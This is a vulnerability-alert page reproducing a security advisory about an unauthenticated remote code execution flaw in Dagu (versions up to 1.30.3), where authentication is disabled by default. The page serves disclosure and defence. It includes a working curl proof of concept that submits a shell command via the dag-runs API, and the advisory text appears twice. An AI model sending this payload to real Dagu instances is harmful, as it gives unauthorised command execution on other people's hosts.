Monitor vulnerabilities like this one.
Sign up free to get alerted when software you use is affected.
9.8
Dagu: Unauthenticated Remote Code Execution Possible with Default Configuration
GHSA-6qr9-g2xw-cw92
Summary
Dagu's default settings leave it open to remote code execution by anyone who can connect to the system. This means an attacker can access and control the system without needing a password. To protect Dagu, you should configure authentication as recommended by the developers.
What to do
No fix is available yet. Check with your software vendor for updates.
Affected software
| Vendor | Product | Affected versions | Fix available |
|---|---|---|---|
| github.com | dagu-org | <= 1.30.3 | – |
Original title
Dagu affected by unauthenticated RCE via inline DAG spec in default configuration
Original description
### Summary
Dagu's default configuration ships with authentication disabled. The `POST /api/v2/dag-runs` endpoint accepts an inline YAML spec and executes its shell commands immediately with no credentials required — any dagu instance reachable over the network is fully compromised by default.
### Details
`internal/service/app/config/loader.go:226` sets `AuthModeNone` as the default. With no auth mode configured, `internal/frontend/api/v2/handlers/api.go:520` returns `nil` from `requireExecute()` — all permission checks pass without a valid session.
The `POST /api/v2/dag-runs` endpoint accepts a `spec` field containing a full YAML DAG definition. The spec is parsed and the commands execute immediately on the host with no validation beyond YAML parsing.
### PoC
```bash
curl -s -X POST http://TARGET:8080/api/v2/dag-runs \
-H "Content-Type: application/json" \
-d '{"name":"poc","spec":"steps:\n - name: rce\n command: id > /tmp/pwned\n"}'
# Response: {"dagRunId":"<uuid>"}
# /tmp/pwned contains: uid=1000(dagu) gid=1000(dagu)
```
Confirmed on `ghcr.io/dagu-org/dagu:latest` with no configuration changes.
### Impact
Every dagu deployment using default settings — every Docker deployment, every install following the documentation, every instance without explicit `DAGU_AUTH_MODE` configuration — is fully compromised without credentials. An attacker with network access gets OS command execution as the dagu process user.
Dagu's default configuration ships with authentication disabled. The `POST /api/v2/dag-runs` endpoint accepts an inline YAML spec and executes its shell commands immediately with no credentials required — any dagu instance reachable over the network is fully compromised by default.
### Details
`internal/service/app/config/loader.go:226` sets `AuthModeNone` as the default. With no auth mode configured, `internal/frontend/api/v2/handlers/api.go:520` returns `nil` from `requireExecute()` — all permission checks pass without a valid session.
The `POST /api/v2/dag-runs` endpoint accepts a `spec` field containing a full YAML DAG definition. The spec is parsed and the commands execute immediately on the host with no validation beyond YAML parsing.
### PoC
```bash
curl -s -X POST http://TARGET:8080/api/v2/dag-runs \
-H "Content-Type: application/json" \
-d '{"name":"poc","spec":"steps:\n - name: rce\n command: id > /tmp/pwned\n"}'
# Response: {"dagRunId":"<uuid>"}
# /tmp/pwned contains: uid=1000(dagu) gid=1000(dagu)
```
Confirmed on `ghcr.io/dagu-org/dagu:latest` with no configuration changes.
### Impact
Every dagu deployment using default settings — every Docker deployment, every install following the documentation, every instance without explicit `DAGU_AUTH_MODE` configuration — is fully compromised without credentials. An attacker with network access gets OS command execution as the dagu process user.
ghsa CVSS3.1
9.8
Vulnerability type
CWE-306
Missing Authentication for Critical Function
Published: 19 Feb 2026 · Updated: 7 Mar 2026 · First seen: 6 Mar 2026